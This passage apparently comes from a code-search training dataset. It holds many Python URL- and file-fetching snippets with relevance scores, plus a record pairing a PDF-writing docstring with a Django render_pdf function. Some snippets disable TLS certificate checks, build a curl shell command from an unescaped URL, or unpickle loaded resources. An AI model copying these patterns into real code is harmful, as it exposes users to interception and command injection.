\"{0}/{1}\".format(server_url, path)\n r = requests.get(artifact_url)\n r.raise_for_status()\n if transform_func:\n return transform_func(r.text)\n else:\n return r.text", "def cached_path(url_or_filename, cache_dir=None):\n if cache_dir is None:\n cache_dir = PYTORCH_PRETRAINED_BIGGAN_CACHE\n if sys.version_info[0] == 3 and isinstance(url_or_filename, Path):\n url_or_filename = str(url_or_filename)\n if sys.version_info[0] == 3 and isinstance(cache_dir, Path):\n cache_dir = str(cache_dir)\n\n parsed = urlparse(url_or_filename)\n\n if parsed.scheme in ('http', 'https', 's3'):\n # URL, so get it from the cache (downloading if necessary)\n return get_from_cache(url_or_filename, cache_dir)\n elif os.path.exists(url_or_filename):\n # File, and it exists.\n return url_or_filename\n elif parsed.scheme == '':\n # File, but it doesn't exist.\n raise EnvironmentError(\"file {} not found\".format(url_or_filename))\n else:\n # Something unknown\n raise ValueError(\"unable to parse {} as a URL or as a local path\".format(url_or_filename))", "def get_url(self):\n return self.get_file(uri_type=URI_URL, no_copy=True)", "def load_file_from_url(self, url: str) -> bytes:\n cached_content = self.cache_get(url)\n if cached_content is not None:\n return cached_content\n try:\n req = requests.get(url, timeout=self.requests_timeout)\n req.raise_for_status()\n content = req.content\n self.cache_set(url, content)\n except requests.RequestException as err:\n self.log_error(err)\n repl_content = self.get_replacement_file(url)\n if repl_content is None:\n raise ImageNotFound(err)\n content = repl_content\n return content", "def getOriginalFile(url):\n # does url exist?\n if url is None or url is \"\":\n return", "def web_get_file(self, url):\n try:\n print(url)\n response = requests.get(url, verify=False)\n file_buffer = BytesIO(response.content)\n file_buffer.seek(0)\n return file_buffer\n except:\n print(traceback.print_exc())\n return None", "def getfile(url):\n try:\n return urlreq.urlopen(url)\n except urlreq.HTTPError as e:\n safeprint(\"Sever returned with response code \" + str(e.getcode()) + \", download failed.\")", "def get_url(self, fname):\n self._assert_file_in_registry(fname)\n return self.urls.get(fname, \"\".join([self.base_url, fname]))", "def _lookup_url(self, endpoint, values):\r\n try:\r\n cont = self.get_container(values['container'])\r\n if cont.cdn_enabled:\r\n return \"%s/%s\" % (cont.cdn_uri, values['filename'])\r\n else:\r\n return None\r\n except: # pragma: no cover\r\n return None", "def download(self, url):\n url = URL(url)\n downloader = getattr(self, 'download_%s' % url.scheme, None)\n if downloader is None:\n msg = \"We haven't implemented the '%s' protocol yet.\" % url.scheme\n raise NotImplementedError(msg)\n fp = None\n else:\n fp = downloader(url)\n return fp", "def _s3_get_file(url):\n try:\n return S3().get_contents_from_url(url)\n except Exception as e:\n raise ScrBaseException(\"Could not load file from {0}: {1}\".format(url, e))", "def _get_file_url (url, path) :\n path = path + \"/\" + url.replace (\"/\", \"!\").replace (\":\",\"\").replace (\".\",\"-\")\n spl = path.split (\"-\")\n if len (spl) >= 2 :\n ext = spl [len (spl)-1].lower ()\n if 2 <= len (ext) <= 3 and ext in [\"png\", \"jpg\", \"zip\", \"txt\", \"gif\", \"py\", \"cpp\", \"gz\", \"pdf\", \"tif\", \"py\", \"html\", \"h\"] :\n spl = path.split (\"-\")\n spl = spl [:len(spl)-1]\n path = \"-\".join (spl) + \".\" + ext\n return path", "def get_file(url):\n helpers.make_workdir() # create temp working directory\n file_url = url + constant.MALICIOUS_LOCATION\n print(file_url)\n filename = wget.download(file_url, out=constant.WORKDIR)\n return filename", "def get_url(self):\n try:\n return self._file.url\n except AttributeError:\n raise NotImplementedError(\"Underlying file does not have a URL.\")", "def my_url(url):\n if USE_HTTPS:\n return url_for(url, _scheme=\"https\", _external=True)\n else:\n return url_for(url)", "def get_file(url):\n # Make request\n response = requests.get(url, stream=True)\n response.raise_for_status()\n # Read fits\n iofile = io.BytesIO(response.content)\n content_type = response.headers['Content-Type']\n if content_type == 'image/fits':\n obj = fits.open(iofile)\n else:\n raise Exception('Unknown content type: {0}.'.format(content_type))\n return obj", "def get_filename_from_url(url: str) -> str:\n return os.path.basename(urllib.parse.urlparse(urllib.parse.unquote_plus(url)).path)", "def get_file(URI):\n return file_fabric.get_class(URI).get_content(URI)", "def get_url(file):\n try:\n with open(file, 'r') as f:\n return URL + f.readlines()[0].rstrip()\n except IOError as err:\n print(\"Failed with error: %s\" % err)\n sys.exit(1)", "def GetFile(localFilename):\n\tif os.path.isabs(localFilename):\n\t\tabsFilename = localFilename\n\t\tif os.path.isfile(absFilename):\n\t\t\treturn absFilename\n\t\telse:\n\t\t\treturn None\n\telse:\n\t\tglobal resourcePaths\n\t\tfor resourceDir in resourcePaths:\n\t\t\tabsFilename = os.path.join(resourceDir, localFilename)\n\t\t\tif os.path.isfile(absFilename):\n\t\t\t\treturn absFilename\n\t\treturn None", "def get_file_by_url(url, params=None, **kwargs):\n\n try:\n req = requests.get(url=url, params=params, **kwargs)\n except requests.exceptions.RequestException:\n print(\"Error retrieving data from {}\".format(url))\n return None\n\n req.encoding = req.apparent_encoding\n res_text = \"\\n\".join([domain_to_idna(line) for line in req.text.split(\"\\n\")])\n return res_text", "def try_as_file(inp):\n file = pathlib.Path(inp)\n\n if not file.is_absolute():\n file = pathlib.Path.cwd() / file\n\n if not file.exists():\n return None\n\n try:\n # this will throw if it is a symlink that has a loop in it so that it\n # never points to a base file.\n if file.is_file():\n return file\n except OSError as ex:\n raise Except.FunctionError(\"resolving file '{}' failed: {}\".format(\n file, ex.strerror.lower() ) )\n return None", "def _filename_from_url(url):\n file_name = url.split(\"/\")[-1]\n return file_name", "def get_file(url, file_name=None):\n cache_dir = os.path.join(os.path.expanduser(\"~\"), \".jhML\")\n\n if file_name is None:\n file_name = url[url.rfind('/') + 1:]\n file_path = os.path.join(cache_dir, file_name)\n\n if not os.path.exists(cache_dir):\n os.mkdir(cache_dir)\n\n if os.path.exists(file_path):\n return file_path\n\n print(\"Downloading: \" + file_name)\n try:\n urllib.request.urlretrieve(url, file_path, show_progress)\n except (Exception, KeyboardInterrupt) as e:\n if os.path.exists(file_path):\n os.remove(file_path)\n raise\n print(\" Done\")\n\n return file_path", "def _load_external(self, url):\n if url.startswith('//'):\n # then we have to rely on the base_url\n if self.base_url and 'https://' in self.base_url:\n url = 'https:' + url\n else:\n url = 'http:' + url\n\n if url.startswith('http://') or url.startswith('https://'):\n css_body = self._load_external_url(url)\n else:\n stylefile = url\n if not os.path.isabs(stylefile):\n stylefile = os.path.abspath(\n os.path.join(self.base_path or '', stylefile)\n )\n if os.path.exists(stylefile):\n with codecs.open(stylefile, encoding='utf-8') as f:\n css_body = f.read()\n elif self.base_url:\n url = urllib.parse.urljoin(self.base_url, url)\n return self._load_external(url)\n else:\n raise ValueError(\"Could not find external style: %s\" %\n stylefile)\n return css_body", "def get_datafile_url(self):\n try:\n return self.datafile.url\n except ValueError:\n if core.utils.is_absolute_url(self.source):\n if self.source.startswith('s3://'):\n return None # file is in the UPLOAD_BUCKET\n return self.source\n logger.error(\"File not found at '%s'\", self.datafile.name)\n return None", "def _findfile(self, path):\n\n # Build list of possible local file paths\n if not self._isurl(path):\n # Valid local paths\n filelist = self._possible_names(path)\n # Paths in self._destpath\n filelist += self._possible_names(self.abspath(path))\n else:\n # Cached URLs in self._destpath\n filelist = self._possible_names(self.abspath(path))\n # Remote URLs\n filelist = filelist + self._possible_names(path)\n\n for name in filelist:\n if self.exists(name):\n if self._isurl(name):\n name = self._cache(name)\n return name\n return None", "def static_resource(filename):\n mime_type, encoding = mimetypes.guess_type(filename)\n try:\n fd = open(filename)\n except EnvironmentError:\n raise NotFound()\n try:\n return Response(fd.read(), content_type=mime_type)\n finally:\n fd.close()", "def getOrDownloadImageObject(self, url):\n \n if \"//\" in url:\n return self.downloadImage(url)\n else:\n return self.getPILFromPath(url)", "def staticfile(path):\n normalized_path = posixpath.normpath(urllib.unquote(path)).lstrip('/')\n absolute_path = finders.find(normalized_path)\n if not absolute_path and getattr(settings, 'STATIC_ROOT', None):\n absolute_path = os.path.join(settings.STATIC_ROOT, path)\n if absolute_path:\n return '%s%s?v=%s' % (settings.STATIC_URL, path, os.stat(absolute_path)[stat.ST_MTIME])\n return path", "def get_external_link_for_static_file(fpath=''):\r\n url_path = static(fpath)\r\n url_scheme = settings.EXTERNAL_URL_SCHEME\r\n url_host = settings.EXTERNAL_URL_HOST\r\n return f'{url_scheme}://{url_host}{url_path}'", "def load_url(url):\n\n req = urllib2.Request(url = url)\n f = urllib2.urlopen(req)\n return f.read()", "def filename_from(url):\n filename = url.split('/')[-1]\n return filename", "def get_file(self, filename, handler=False):\n result = None\n if self.exists(filename):\n file_path = join_paths(self.path, filename)\n if handler:\n result = open(file_path, 'rb')\n else:\n result = file_path\n return result", "def getfilehttps(self, url):\n ctx = ssl.create_default_context()\n ctx.check_hostname = False\n ctx.verify_mode = ssl.CERT_NONE\n response = urllib.request.urlopen(url, context=ctx)\n result = response.read()\n return result", "def _local_path_from_url(url):\n filename = '{}.epub'.format(hashlib.sha224(url).hexdigest())\n return os.path.join(books_settings.LOCAL_BOOKS_PATH, filename)", "def GetFileAssetUrl(aid: maxon.Id) -> maxon.Url:\n # Bail when the asset ID is invalid.\n if not isinstance(aid, maxon.Id) or aid.IsEmpty():\n raise RuntimeError(f\"{aid = } is not a a valid asset ID.\")\n\n # Get the user repository, a repository which contains almost all assets, and try to find the\n # asset description, a bundle of asset metadata, for the given asset ID in it.\n repo: maxon.AssetRepositoryRef = maxon.AssetInterface.GetUserPrefsRepository()\n if repo.IsNullValue():\n raise RuntimeError(\"Could not access the user repository.\")\n \n asset: maxon.AssetDescription = repo.FindLatestAsset(\n maxon.AssetTypes.File(), aid, maxon.Id(), maxon.ASSET_FIND_MODE.LATEST)\n if asset.IsNullValue():\n raise RuntimeError(f\"Could not find file asset for {aid}.\")\n\n # When an asset description has been found, return the URL of that asset in the \"asset:///\"\n # scheme for the latest version of that asset.\n return maxon.AssetInterface.GetAssetUrl(asset, True)", "def load(resource_url, format='auto'):\n\n if format=='auto':\n format = os.path.splitext(resource_url)[-1].strip('.')\n\n if format=='pickle':\n resource_val = pickle.load(find(resource_url))\n elif format=='raw':\n resource_val = find(resource_url).open()\n else:\n assert format not in FORMATS\n raise ValueError('Unknown format type: %s' % format)\n\n return resource_val", "def handle_url(self, url):\n parse = urlparse.urlparse(url, \"http\")\n # relative url path\n if not parse.netloc:\n parse = urlparse.urlparse(\n urlparse.urljoin(\n self.source_url,\n parse.path))\n return urlparse.urlunparse(parse)", "def get_by_filename_as_path(self, decoded_url):\n return Attachment(self.context, ServiceOperationPath(\"GetByFileNameAsPath\", [decoded_url], self.resource_path))", "def _get_source(link):\n if link.startswith(\"http://\") or link.startswith(\"https://\"):\n down = httpkie.Downloader()\n return down.download(link)\n\n if os.path.exists(link):\n with open(link) as f:\n return f.read()\n\n raise UserWarning(\"html: '%s' is neither URL or data!\" % link)", "def load_url(src):\n return LOAD(url=src)", "def url(self, name):\n if self.base_url is None:\n raise ValueError(\"This file is not accessible via a URL.\")\n url = filepath_to_uri(name)\n if url is not None:\n url = url.lstrip('/')\n return urljoin(self.base_url, url)", "def find_file(self, filename, pathlist = ['.']):\n if filename.startswith('http://') or filename.startswith('https://'):\n return (urlopen(filename), filename)\n for path in [''] + pathlist:\n filepath = abspath(path + '/' + filename)\n if isfile(filepath):\n f = open(filepath, 'r')\n return (f, filepath)\n raise FileNotFoundError(filename, pathlist)", "def load_url_content(url):\n try:\n r = requests.get(url)\n if r.ok:\n return r.text\n else:\n return None\n except Exception:\n return None", "def download_from_url(path, url):\n filename = url.split(\"/\")[-1]\n found_file = find_file(path, filename, max_depth=0)\n if found_file is None:\n filename = os.path.join(path, filename)\n logging.info(\"Downloading from %s to %s.\" % (url, filename))\n inprogress_filepath = filename + \".incomplete\"\n inprogress_filepath, _ = urllib.request.urlretrieve(\n url, inprogress_filepath, reporthook=download_report_hook)\n # Print newline to clear the carriage return from the download progress.\n print()\n tf.gfile.Rename(inprogress_filepath, filename)\n return filename\n else:\n logging.info(\"Already downloaded: %s (at %s).\" % (url, found_file))\n return found_file", "def url_filename(url):\n return os.path.basename(urlparse.urlparse(url).path)", "def _get_file_helper(self):\n page = self.course.moodle.fetch(\n self._download_url % self.id,\n None\n )\n # The resource URL should magically 303 across to the actual file\n if page.history and page.history[0].status_code == 303:\n return page, page.content\n\n # If it doesn't 303 to the actual file then there might be a download\n # link to try\n bs = bs4.BeautifulSoup(page.text, 'lxml')\n\n div = bs.find('div', class_='resourceworkaround')\n\n if div: # it's a link to the resource\n link = div.find('a').href\n\n page = self.course.moodle.fetch(\n link,\n None\n )\n return page, page.content\n\n # Perhaps it's an embedded object\n obj = bs.find('object', id='resourceobject')\n if obj:\n link = obj['data']\n\n page = self.course.moodle.fetch(\n link,\n None\n )\n return page, page.content\n\n raise ValueError(\"No idea how to get that resource\")", "def url(self, path=None, type_of=\"csv\"):\n\n if \"https://\" in str(path) or \"http://\" in str(path) or \"file://\" in str(path):\n return self.data_loader(str(path), type_of)\n else:\n print(\"Unknown sample data identifier. Please choose an id from the list below\")", "def url(self, path=None, type_of=\"csv\"):\n\n if \"https://\" in str(path) or \"http://\" in str(path) or \"file://\" in str(path):\n return self.data_loader(str(path), type_of)\n else:\n print(\"Unknown sample data identifier. Please choose an id from the list below\")", "def get_file(self, url, path, step_name=None, headers=None,\n transient_retry=True, strip_prefix=None, timeout=None):\n return self._get_step(url, path, step_name, headers, transient_retry,\n strip_prefix, False, timeout, '')", "def _get_filename_from_url(self) -> Optional[str]:\n file_name_portion = None\n\n right_portion = self.url.rsplit(\"/\", 1)\n if len(right_portion) == 2:\n # split any potential query params - these start with \"?\"\"\n file_name_portion = right_portion[1].split(\"?\")[0].strip()\n\n if len(file_name_portion) == 0:\n file_name_portion = None\n\n return file_name_portion", "def fileUrl(self) -> str:\n if self.urls is None or len(self.urls) == 0:\n raise InputOutputError('Chart version does not have file urls')\n\n if is_absolute_url(self.urls[0]):\n return self.urls[0]\n return posixpath.join(self.chart.repository.url, self.urls[0])", "def getResource(self, url):\n\n res = self.getRequest(url)\n return self._instantiateResource(res)", "def get(self, url, path):\n rpath = urllib.parse.urlparse(url).path\n try:\n self.sftp.get(rpath, path)\n except Exception as e:\n osaka.utils.LOGGER.warning(\n \"Encountered exception: {}\\n{}\".format(e, traceback.format_exc())\n )\n raise osaka.utils.OsakaFileNotFound(\"File {} doesn't exist.\".format(url))", "async def api_staticFile(self, path_info=None):\n if not path_info:\n raise sirepo.util.NotFound(\"empty path info\")\n self._proxy_react(f\"{sirepo.const.STATIC_D}/\" + path_info)\n p = sirepo.resource.static(sirepo.util.validate_path(path_info))\n if re.match(r\"^(html|en)/[^/]+html$\", path_info):\n return self.reply_html(p)\n return self.reply_file(p)", "def static(filename):\n return href.static(file=filename)", "def asset_url(filename=\"\", version=True):\n if filename.startswith(\"http\") or filename.startswith(\"/\"):\n return filename\n else:\n if config.static_url:\n return_url = \"http://\" + config.static_url\n else:\n return_url = \"/static\" # web.ctx.home + \"/static\"\n if filename:\n return_url += \"/\" + filename\n if version:\n return_url += \"?\" + config.asset_version\n return return_url", "def fetch(self, url):\r\n fname = os.path.join(self._cachedir, self._formatter(url))\r\n if not os.path.exists(fname):\r\n time.sleep(self._sleep)\r\n html = urllib.urlopen(url).read()\r\n with codecs.open(fname, 'w', 'utf-8') as f:\r\n soup = BeautifulSoup(html)\r\n f.write(unicode(soup))\r\n return fname", "def fetch(file_url):\n\n tmp_file_handle = NamedTemporaryFile(delete=True)\n headers = {'User-Agent': 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36'}\n\n # download file and save to temp object\n with requests.get(file_url, headers=headers, stream=True) as r:\n tmp_file_handle.write(r.content)\n\n tmp_file_handle.flush()\n\n return tmp_file_handle", "def resolve_resource(url):\n try:\n resource = soundcloud.get('/resolve', url=url)\n except HTTPError as e:\n if e.response.status_code == 404:\n return None\n else:\n raise\n \n return resource", "def fetch_url(url):\n logger.info(\"Resolving \" + url)\n try:\n resp = requests.get(url, timeout=1.5)\n resp.raise_for_status()\n return {\n \"resolved_url\": resp.url,\n \"raw_content\": resp.text\n }\n except Exception as e:\n logger.error('Error fetching %s' % url, e)\n return {\n \"resolved_url\": url,\n \"raw_content\": \"\",\n \"url_error\": str(e)\n }", "def fetch_maybe(cls, url, path, save=False):\n if os.path.isfile(path):\n # print(\"Found %s\" % os.path.basename(path))\n with open(path, \"rb\") as file:\n return file.read(), True\n if save:\n return cls.fetch_and_save(url, path), False\n return cls.fetch_with_retry(url), False", "def get_url(url):\r\n response = requests.get(url)\r\n content = response.content.decode(\"utf8\")\r\n return content", "def get_file(_file):\n _file = pathlib.Path(_file)\n if not _file.is_file():\n _file = None\n return _file", "def get_url_filename(url, headers=None, strip=[]):\n filename = get_url_disposition_filename(url, headers)\n if filename:\n return filename\n return get_url_straight_filename(url, strip=[])", "def _get(url):\n url = urlparse(url)\n conn = HTTPConnection(url.hostname, url.port)\n conn.request('GET', url.path+url.query)\n return conn.getresponse().fp.read()", "def get_url_straight_filename(url, strip=[], allowdir=False):\n path = urlunquote(urlsplit(url).path)\n path_parts = path.split('/')\n\n if allowdir:\n # strip empty ones\n while len(path_parts) > 1 and not path_parts[-1]:\n path_parts = path_parts[:-1]\n\n if strip:\n while path_parts and path_parts[-1] in strip:\n path_parts = path_parts[:-1]\n\n if path_parts:\n return path_parts[-1]\n else:\n return None", "def get_url(self, download_url):\n curl_cmd = self.prepare_curl_cmd()\n curl_cmd.extend(\n [\n \"--silent\",\n \"--head\",\n \"--write-out\",\n \"%{url_effective}\",\n \"--url\",\n download_url,\n \"--output\",\n \"/dev/null\",\n ]\n )\n file_url = self.download_with_curl(curl_cmd)\n return file_url", "def get_url(name, version=None):\n global urls\n\n # Only download the URL look up table once.\n if urls is None:\n from six.moves.urllib.request import urlopen\n import json\n f = urlopen(\"http://sncosmo.github.io/data/urls.json\")\n reader = codecs.getreader(\"utf-8\")\n urls = json.load(reader(f))\n f.close()\n\n key = name if (version is None) else \"{0}_v{1}\".format(name, version)\n\n return urls[key]", "def fetch_file(url, filename):\n from clinica.utils.exceptions import ClinicaException\n from urllib.request import Request, urlopen\n from urllib.error import URLError\n import shutil\n import ssl\n import os.path\n from clinica.utils.stream import cprint\n\n head_tail = os.path.split(filename)\n if not os.path.exists(head_tail[0]):\n cprint('Path to the file does not exist')\n cprint('Stop Clinica and handle this error')\n\n # Download the file from `url` and save it locally under `file_name`:\n cert = ssl.get_server_certificate((\"aramislab.paris.inria.fr\", 443))\n gcontext = ssl.SSLContext()\n req = Request(url)\n try:\n response = urlopen(req, context=gcontext)\n except URLError as e:\n if hasattr(e, 'reason'):\n cprint('We failed to reach a server.')\n cprint(['Reason: ' + e.reason])\n elif hasattr(e, 'code'):\n cprint('The server could not fulfill the request.')\n cprint(['Error code: ' + e.code])\n else:\n try:\n with open(filename, 'wb') as out_file:\n shutil.copyfileobj(response, out_file)\n except OSError as err:\n cprint(\"OS error: {0}\".format(err))", "def get_file_from_path(file_path):\n return Utils.get_real_file_path(file_path)", "def file_url(self, url):\n return self.is_regex_url(url, self.is_file_regex)", "def get_by_url(self, url, pool_name=None):\n\t\tif not pool_name:\n\t\t\treturn self.pool[url]\n\t\treturn getattr(self, pool_name)[url]", "def get(self, url, recache=False):\n\n cachedir = self._cachedir(url)\n cachefilename = self._cachefilename(cachedir)\n\n # If \"filename\" file exists, it's a hit; read the actual filename\n # from there and return the cached content file\n if cachefilename.exists() and not recache:\n logger.debug(f\"Cache hit for {url}\")\n with open(cachefilename) as f:\n filename = f.readline()\n return cachedir / filename\n\n # Cache miss; attempt to download the URL\n with requests.get(url, allow_redirects=True, stream=True,\n timeout=30.0) as r:\n r.raise_for_status()\n\n # Determine download filename\n filename = None\n cd = r.headers.get('content-disposition')\n if cd:\n filenames = re.findall('filename=([^;]+)', cd)\n if len(filenames) > 0:\n filename = filenames[0]\n if filename is None:\n filename = os.path.basename(urllib.parse.urlparse(url).path)\n logger.info(f\"Caching {url} ({filename})\")\n\n cachefile = cachedir / filename\n try:\n # Download file\n with open(cachefile, 'wb') as fd:\n for chunk in r.iter_content(chunk_size=1024):\n fd.write(chunk)\n\n self._writefilename(cachedir, filename)\n\n except:\n if cachefile.exists():\n cachefile.unlink()\n if cachefilename.exists():\n cachefilename.unlink()\n raise\n\n logger.debug(\"Downloaded file\")\n return cachefile", "def request_url(url, display, file=None):\n if file is not None:\n r = requests.get(url, stream=True)\n r.raise_for_status()\n with open(file, \"wb\") as fd:\n for chunk in r.iter_content(chunk_size=128):\n fd.write(chunk)\n return r.raise_for_status()\n else:\n r = requests.get(url)\n r.raise_for_status()\n if display == \"xml\":\n return xmltodict.parse(r.text)\n elif display == \"fasta\" or display == \"fastq\":\n return format_seq_content(r.text, display)\n else:\n return r.text", "def _local_fopen(self,url):\n\n m = re.search(\"(black|malware)\", url)\n\n if m:\n if m.group(1) == \"black\":\n return open(\"gsb_phishing.html\")\n elif m.group(1) == \"malware\":\n return open(\"gsb_malware2.html\")", "def url(self):\n if not self.fid:\n raise exceptions.NotCreatedError(object=self)\n\n return self._file_url(self.fid)", "def from_url(abs_url):\n from office365.sharepoint.client_context import ClientContext\n ctx = ClientContext.from_url(abs_url)\n relative_url = abs_url.replace(ctx.base_url, \"\")\n return ctx.web.get_folder_by_server_relative_url(relative_url)", "def from_url(self, url: str) -> Optional[str]:\n parsed = urlparse.urlparse(url)\n if parsed.scheme not in {'http', 'https', ''}:\n return None\n\n path = parsed.path\n if parsed.query:\n path += '?' + parsed.query\n\n # Discard $1 and everything after it\n path, *_ = path.partition('$1')\n\n for domain in self.domains:\n if domain in parsed.netloc:\n break\n else:\n return None\n\n matched_sites = set()\n for code in chain(self.codes,\n getattr(self, 'test_codes', ()),\n getattr(self, 'closed_wikis', ()),\n ):\n if self._hostname(code)[1] == parsed.netloc:\n # Use the code and family instead of the url\n # This is only creating a Site instance if domain matches\n site = pywikibot.Site(code, self.name)\n pywikibot.log(f'Found candidate {site}')\n\n for iw_url in site._interwiki_urls():\n iw_url, *_ = iw_url.partition('{}')\n if path.startswith(iw_url):\n matched_sites.add(site)\n break\n\n if len(matched_sites) == 1:\n return matched_sites.pop().code\n\n if not matched_sites:\n return None\n\n raise RuntimeError(\n 'Found multiple matches for URL \"{}\": {}'\n .format(url, ', '.join(str(s) for s in matched_sites)))", "def get_from(url):\r\n try:\r\n with current_app.app_context():\r\n r = requests.get(url, timeout=current_app.config[\"TIMEOUT\"])\r\n if r.status_code == 200:\r\n return r.json()\r\n return None\r\n except:\r\n return None", "def url_to_file_storage(url):\n r = requests.get(url, stream=True)\n filename = r.url.split('/')[-1]\n content_type = r.headers.get('Content-Type', 'application/octet-stream')\n return FileStorage(stream=r.raw, filename=filename, content_type=content_type)", "def get_file(self, **kwargs) -> File:\n file_name = self._get_file_name()\n file_data = self._download_from_url()\n return File(file_name, BytesIO(file_data))", "def get_content_from_static_url(link):\n # sleep time before making web request\n sleep(SCRAPING_REQUEST_STAGGER)\n # header details for web request\n headers = {\"User-agent\": \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, \\\n like Gecko) Chrome/47.0.2526.80 Safari/537.36\"}\n response = requests.get(link, headers=headers)\n if response.status_code != 200:\n return False\n return response.content", "def get_file_name(url: str):\n filename = os.path.basename(url)\n fname, extension = os.path.splitext(filename)\n if extension:\n if \"=\" in filename:\n return filename.split(\"=\")[-1]\n return filename\n header = requests.head(url).headers\n if \"Location\" in header:\n return os.path.basename(header[\"Location\"])\n return filename", "def _process_resource(self, url):\n url_parts = urlparse.urlsplit(url)\n rel_path = url_parts.path[1:]\n fs_path = os.path.join(self.fileserver_path, rel_path)\n self.logger.info('Downloading {0} to {1}'.format(url, fs_path))\n self._execute_command('curl --create-dirs -Lo {0} {1}'\n .format(fs_path, url), retries=2)\n url = url.replace(url_parts.netloc, self.fs_base_url)\n url = url.replace(url_parts.scheme, 'http')\n return url", "def from_url(self) -> PngImagePlugin.PngImageFile:\n response = requests.get(self.url)\n img = Image.open(BytesIO(response.content))\n\n return img", "def _get_url(self, absolute):", "def get_page(url):\n try:\n return urlopen(url).read()\n except:\n return None\n return None", "def get(self):\n # If we have a cache_key, see if there is data under that key\n # in our url cache and use that if there is.\n #\n if self.cache_key and self.cache_key in self.cache:\n return self.cache[self.cache_key]\n\n # If the actual URL is the empty string, and we did not have a cached\n # result for it, then we can not retrieve anything. Return None.\n #\n if self.url is None or len(self.url) == 0:\n return None\n\n if not self.use_post:\n # If we are NOT using 'POST' to query the URL we can create a\n # simple urllib2.Request object.\n #\n req = urllib2.Request(self.url)\n else:\n # If we ARE using 'POST' then we need to interpret the\n # parameters out of the URL and pass them as the 'data'\n # parameter to the request object we are creating. This will\n # cause 'urlopen()' to use POST to get the results.\n #\n o = urlparse.urlsplit(self.url)\n req = urllib2.Request(o.scheme + \"://\" + o.netloc + o.path, o.query)\n\n # If 'spoof_url' is NOT None, then we\n # want our request to use the 'spoof_url' as its referrer\n #\n if self.spoof_url is not None:\n req.add_header('Referer', self.spoof_url)\n\n # What we get from the remote site is UTF-8 so decode it in to unicode\n # and then encode that as ASCII with characters that can not be\n # represented in ASCII replaced with their XML character references.\n #\n f = urllib2.urlopen(req)\n content_type = f.info()['Content-Type'].lower()\n\n # Based on the content type we need to deal with the response\n # in various ways, like unzip, or re-encoding as ascii.\n #\n if content_type == \"application/zip\":\n # In zip files we extract all the individual files.\n #\n # NOTE: Since the zipfile.ZipFile class needs a file like object\n # with the 'seek()' method we use a StringIO to hold\n # our url result data.\n #\n result = []\n stringy = StringIO(f.read())\n z = zipfile.ZipFile(stringy, 'r')\n members = z.namelist()\n for member in members:\n result.append(z.read(member))\n z.close()\n stringy.close()\n\n # The way the scraper wants to work is that it gets all parts\n # of such a zip file as a single string.. so join them all\n # together (separated by a newline character, just because.)\n #\n result = \"\\n\".join(result)\n elif content_type[0:9] == \"text/xml;\":\n ign,charset = content_type.split('=')\n\n # XXX We should just return what we get and not encode it as\n # ascii. The end point should encode if it only wants to\n # see a string... (or maybe we SHOULD do this..)\n #\n result = f.read().decode(charset).encode(\"ascii\",\n \"xmlcharrefreplace\")\n else:\n # Finally we do not know what to do with it.. just read it\n # in to a string.\n #\n result = f.read()\n\n f.close()\n if self.cache_key:\n self.cache[self.cache_key] = result\n return result" ]
[ "0.7276085", "0.7078293", "0.66783506", "0.6656778", "0.643477", "0.6392354", "0.6384419", "0.6384419", "0.6384419", "0.63783556", "0.63404953", "0.63349915", "0.6328483", "0.62485206", "0.6248228", "0.6211496", "0.62018925", "0.6179627", "0.61627275", "0.6156638", "0.6155268", "0.6056734", "0.60454583", "0.6009426", "0.5991718", "0.5976033", "0.5952032", "0.59428823", "0.5933517", "0.59307516", "0.59301734", "0.587187", "0.5861199", "0.5847007", "0.58421475", "0.58252037", "0.5823716", "0.57639396", "0.5748607", "0.57449836", "0.57390225", "0.5683188", "0.56831586", "0.5681161", "0.56704366", "0.56695557", "0.5664737", "0.56531256", "0.5631833", "0.5613001", "0.560764", "0.5606315", "0.55973494", "0.5593924", "0.558038", "0.556226", "0.55587405", "0.55562234", "0.5554666", "0.5554666", "0.5548668", "0.55479026", "0.5545643", "0.5544774", "0.55391395", "0.55243415", "0.5519566", "0.55152756", "0.55133647", "0.55097526", "0.54862845", "0.54826736", "0.54665285", "0.54590034", "0.5454849", "0.54492897", "0.54403347", "0.5431064", "0.5430604", "0.54301924", "0.5426393", "0.5425549", "0.5419589", "0.54092735", "0.540768", "0.5402924", "0.5394181", "0.5390321", "0.53664386", "0.53657734", "0.53567713", "0.53462094", "0.5344211", "0.53422326", "0.53402716", "0.5337618", "0.5327335", "0.53248364", "0.5323709", "0.532207" ]
0.68511707
2
Writes the PDF data into ``file_``. Note that ``file_`` can actually be a Django Response object as well, since these are filelike objects. This function may be used as a helper that can be used to save a PDF file to a file (or anything else outside of a request/response cycle).
def render_pdf( template: Union[List[str], str], file_: IO, url_fetcher=django_url_fetcher, context: Optional[dict] = None, ): context = context or {} if isinstance(template, str): template = [template] html = select_template(template).render(context) HTML( string=html, base_url="not-used://", url_fetcher=url_fetcher, ).write_pdf( target=file_, )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def save_pdf(self, response):\n\n # get metadata\n file_type = \"__comprovante_de_acesso__\"\n\n # options to save pdf\n file_id = str(uuid.uuid4())\n filename = \"{file_id}.pdf\".format(file_id=file_id)\n file_path = os.path.join(path, \"downloads\", self.scrape_id, filename)\n with open(file_path, 'wb') as f:\n f.write(response.body)\n\n # upload pdf to s3 and call the webhook\n self.upload_file(file_id)\n\n # update values in result\n self.result.update({file_type: {\"file_id\": file_id}})", "def save_pdf(self, response):\n\n if response.status != 200 and self.file_retries > 0:\n self.file_retries -= 1\n yield response.request.replace(dont_filter=True)\n return\n elif response.status != 200:\n return\n else:\n # refresh\n self.file_retries = 3\n\n # get metadata\n file_type = \"__boleto__\"\n invoice_status = response.meta['invoice_status']\n document = response.meta['document']\n\n # options to save pdf\n file_id = str(uuid.uuid4())\n filename = \"{file_id}.pdf\".format(file_id=file_id)\n file_path = os.path.join(path, \"downloads\", self.scrape_id, filename)\n with open(file_path, 'wb') as f:\n f.write(response.body)\n\n # upload pdf to s3 and call the webhook\n self.upload_file(file_id)\n\n # update values in result\n document_value = self.result[document]\n [item.update({\n file_type: {\n \"file_id\": file_id}\n }) for item in document_value[invoice_status]\n if item == response.meta['invoice']]\n self.result.update({document: document_value})", "def response_pdf(self, filename):\n now = DateTime()\n nice_filename = '%s_%s' % (filename, now.strftime('%Y%m%d'))\n self.request.response.setHeader(\"Content-Type\", \"application/pdf\")\n self.request.response.setHeader(\"Content-Disposition\", 